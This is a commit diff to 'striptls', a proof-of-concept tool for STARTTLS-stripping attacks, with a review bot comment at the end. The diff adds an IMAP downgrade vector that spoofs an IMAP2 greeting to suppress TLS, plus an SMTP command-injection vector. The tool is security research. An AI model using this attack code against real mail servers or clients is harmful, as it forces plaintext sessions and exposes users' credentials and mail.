add SMTP.InjectCommand, IMAP.DowngradeToV2
tintinweb committed Feb 13, 2016
1 parent 32d2f6c commit 8e03217
Showing 2 changed files with 48 additions and 1 deletion.
5 changes: 4 additions & 1 deletion README.md
Expand Up @@ -9,6 +9,7 @@ poc implementation of STARTTLS stripping attacks
* SMTP.StripWithTemporaryError
* SMTP.StripWithError
* SMTP.ProtocolDowngradeStripExtendedMode
* SMTP.InjectCommand
* POP3
* POP3.StripFromCapabilities
* POP3.StripWithError
Expand All @@ -17,6 +18,7 @@ poc implementation of STARTTLS stripping attacks
* IMAP.StripFromCapabilities
* IMAP.StripWithError
* IMAP.UntrustedIntercept
* IMAP.ProtocolDowngradeToV2
* FTP
* FTP.StripFromCapabilities
* FTP.StripWithError
Expand Down Expand Up @@ -86,8 +88,9 @@ Results:
IRC.UntrustedIntercept, NNTP.StripFromCapabilities,
NNTP.StripWithError, NNTP.UntrustedIntercept,
POP3.StripFromCapabilities, POP3.StripWithError,
POP3.UntrustedIntercept,
POP3.UntrustedIntercept, SMTP.InjectCommand,
SMTP.ProtocolDowngradeStripExtendedMode,
SMTP.ProtocolDowngradeToV2,
SMTP.StripFromCapabilities, SMTP.StripWithError,
SMTP.StripWithInvalidResponseCode,
SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
44 changes: 44 additions & 0 deletions striptls/striptls.py
Expand Up @@ -297,6 +297,24 @@ def mangle_client_data(session, data, rewrite):
rewrite.set_result(session, True)
return data

class ProtocolDowngradeToV2:
''' Return IMAP2 instead of IMAP4 in initial server response
'''
@staticmethod
def mangle_server_data(session, data, rewrite):
if all(kw.lower() in data.lower() for kw in ("IMAP4","* OK ")):
session.inbound.sendall("OK IMAP2 Server Ready\r\n")
logging.debug("%s [client] <= [server][mangled] %s"%(session,repr("OK IMAP2 Server Ready\r\n")))
data=None
return data
@staticmethod
def mangle_client_data(session, data, rewrite):
if "STARTTLS" in data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(data))
elif "mail from" in data.lower():
rewrite.set_result(session, True)
return data

class StripWithInvalidResponseCode:
''' 1) Force Server response to contain STARTTLS even though it does not support it (just because we can)
2) Respond to client STARTTLS with invalid response code
Expand Down Expand Up @@ -376,6 +394,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if "220" not in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand All @@ -399,6 +418,24 @@ def mangle_client_data(session, data, rewrite):
session.inbound.sendall("502 Error: command \"EHLO\" not implemented\r\n")
logging.debug("%s [client] <= [server][mangled] %s"%(session,repr("502 Error: command \"EHLO\" not implemented\r\n")))
data=None
elif "mail from" in data.lower():
rewrite.set_result(session, True)
return data

class InjectCommand:
''' Append command to STARTTLS\r\n.
'''
@staticmethod
def mangle_server_data(session, data, rewrite):
return data
@staticmethod
def mangle_client_data(session, data, rewrite):
if "STARTTLS" in data:
#data += "WTF\r\n"
#logging.debug("%s [client] => [server][mangled] %s"%(session,repr(data)))
Vectors.SMTP.UntrustedIntercept.mangle_client_data(session, data, rewrite)
elif "mail from" in data.lower():
rewrite.set_result(session, True)
return data

class POP3:
Expand Down Expand Up @@ -462,6 +499,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if "+OK" not in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -535,6 +573,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if "%s OK"%id not in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -607,6 +646,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not resp_data.startswith("234"):
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -679,6 +719,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not resp_data.startswith("382"):
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -774,6 +815,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not resp_data.startswith("<proceed "):
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -849,6 +891,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not " OK " in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -1051,6 +1094,7 @@ def mangle_client_data(session, data, rewrite):
session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not " 670 " in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))

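Review bot: In the hunk at `@@ -399,6 +418,24 @@`, `InjectCommand`'s docstring ("Append command to STARTTLS\r\n.") no longer describes the body: the append is commented out and `mangle_client_data` only calls `Vectors.SMTP.UntrustedIntercept.mangle_client_data(session, data, rewrite)` and discards its return value, so the method returns the unmodified `data` whatever the delegate did. That makes the new vector an undocumented alias of UntrustedIntercept even though the README now lists it as a separate entry; the discarded result should be reconciled with the `return data` on the last line, or the docstring should say the delegate is invoked for its side effects only. I would also delete the two commented-out lines above the call rather than keep them as dead code, and replace the docstring with `''' Delegate STARTTLS handling to SMTP.UntrustedIntercept; the command-append variant is disabled. '''`. The body of UntrustedIntercept.mangle_client_data continues outside the hunk at `@@ -376,6 +394,7 @@`, so whether it returns `data`, `None` or something else is not visible here.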
